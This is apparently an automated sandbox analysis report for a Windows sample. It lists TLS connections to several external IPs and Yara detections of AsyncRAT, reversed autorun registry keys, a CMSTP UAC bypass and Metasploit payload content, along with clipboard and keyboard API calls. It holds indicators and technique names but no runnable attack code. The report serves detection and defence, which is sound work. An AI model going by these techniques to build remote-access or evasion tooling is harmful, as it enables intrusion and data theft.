                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49759 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49761 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49763 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49764 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49765 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49768 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49769 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49771 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49775 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49777 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49779 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49782 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49783 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49784 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49785 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49787 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49789 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49790 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49792 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49793 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49794 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49795 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49797 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49799 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.204.173.220:443 -> 192.168.11.20:49809 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49816 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49818 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49821 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49822 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49823 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49824 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49826 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49828 version: TLS 1.2

                                Key, Mouse, Clipboard, Microphone and Screen Capturing

                                barindex
                                Yara detected AsyncRAT
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22786943881.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22790546318.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787546897.00000000049C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.22807614059.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22790546318.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22795694035.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22795694035.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.00000000049AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AchillesGuard.com PID: 2308, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTR
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009DEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009DEAFF
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009DED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009DED6A
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009DEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009DEAFF
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CACDA GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,PostMessageW,0_2_009CACDA
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009F9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_009F9576

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
                                Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 50.2.c7f37422c5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 16.2.935372fb1f.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22786943881.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22790546318.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22787546897.00000000049C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000002.22807614059.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000022.00000003.22795694035.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000023.00000002.22887398976.000000000A400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                                Source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000022.00000003.22795694035.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22787007755.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
